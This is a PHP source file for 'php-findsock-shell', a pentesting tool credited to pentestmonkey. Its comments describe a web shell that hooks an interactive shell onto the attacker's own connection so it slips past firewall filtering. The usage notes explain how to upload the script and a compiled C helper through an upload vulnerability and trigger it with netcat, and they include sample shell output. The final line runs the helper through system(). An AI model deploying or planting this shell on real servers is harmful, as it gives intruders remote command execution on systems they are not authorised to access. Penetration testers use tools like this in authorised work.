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<?php
// php-findsock-shell - A Findsock Shell implementation in PHP + C
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// (Pair of) Web server scripts that find the TCP socket being used by the
// client to connect to the web server and attaches a shell to it. This
// provides you, the pentester, with a fully interactive shell even if the
// Firewall is performing proper ingress and egress filtering.
//
// Proper interactive shells are more useful than web-based shell in some
// circumstances, e.g:
// 1: You want to change your user with "su"
// 2: You want to upgrade your shell using a local exploit
// 3: You want to log into another system using telnet / ssh
//
// Limitations
// -----------
// The shell traffic doesn't look much like HTTP, so I guess that you may
// have problems if the site is being protected by a Layer 7 (Application layer)
// Firewall.
//
// The shell isn't fully implemented in PHP: you also need to upload a
// C program. You need to either:
// 1: Compile the program for the appropriate OS / architecture then
// upload it; or
// 2: Upload the source and hope there's a C compiler installed.
//
// This is a pain, but I couldn't figure out how to implement the findsock
// mechanism in PHP. Email me if you manage it. I'd love to know.
//
// Only tested on x86 / amd64 Gentoo Linux.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
//
// Here are some brief instructions.
//
// 1: Compile findsock.c for use on the target web server:
// $ gcc -o findsock findsock.c
//
// Bear in mind that the web server might be running a different OS / architecture to you.
//
// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
// whichever upload vulnerability you've indentified. Both should be uploaded to the
// same directory.
//
// 3: Run the shell from a netcat session (NOT a browser - remember this is an
// interactive shell).
//
// $ nc -v target 80
// target [10.0.0.1] 80 (http) open
// GET /php-findsock-shell.php HTTP/1.0
//
// sh-3.2$ id
// uid=80(apache) gid=80(apache) groups=80(apache)
// sh-3.2$
// ... you now have an interactive shell ...
//
$VERSION = "1.0";
system( "./findsock " . $_SERVER['REMOTE_ADDR'] . " " . $_SERVER['REMOTE_PORT'] )
?>